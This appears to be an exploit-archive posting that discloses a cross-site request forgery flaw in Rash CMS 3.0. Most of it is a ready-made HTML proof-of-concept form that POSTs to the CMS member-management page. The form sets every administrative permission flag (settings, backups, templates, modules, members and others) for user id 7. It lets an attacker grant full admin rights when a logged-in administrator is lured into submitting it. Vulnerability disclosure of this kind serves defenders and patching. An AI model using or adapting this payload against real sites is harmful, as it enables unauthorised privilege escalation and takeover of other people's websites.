Rash CMS 3.0 Cross Site Request Forgery

Rash CMS version 3.0 suffers from a cross site request forgery vulnerability.


MD5 | 6e46dcede56d7ec7d67b85b47034cc19

 # Exploit Title: Rash CMS CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Software Link: http://www.rashcms.com/rashcms.zip
# Version: 3.0
# Tested on: Windows 10 / Kali Linux
# Category: WebApps

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

Exploit :

<form action="http://localhost/rash/manager/pages/member.php"
method="POST">
<input type="text" name="task" value="update"><br>
<input type="text" name="accsess_admin_acc" value="1"><br>
<input type="text" name="newpost" value="1"><br>
<input type="text" name="editotherposts" value="1"><br>
<input type="text" name="backup" value="1"><br>
<input type="text" name="postmgr" value="1"><br>
<input type="text" name="comment" value="1"><br>
<input type="text" name="cat" value="1"><br>
<input type="text" name="block" value="1"><br>
<input type="text" name="extra" value="1"><br>
<input type="text" name="member" value="1"><br>
<input type="text" name="inbox" value="1"><br>
<input type="text" name="uc" value="1"><br>
<input type="text" name="banned" value="1"><br>
<input type="text" name="template" value="1"><br>
<input type="text" name="setting" value="1"><br>
<input type="text" name="permission" value="1"><br>
<input type="text" name="module" value="1"><br>
<input type="text" name="usrid" value="7"><br>
<input type="submit" value="Submit">
</form>

Related Posts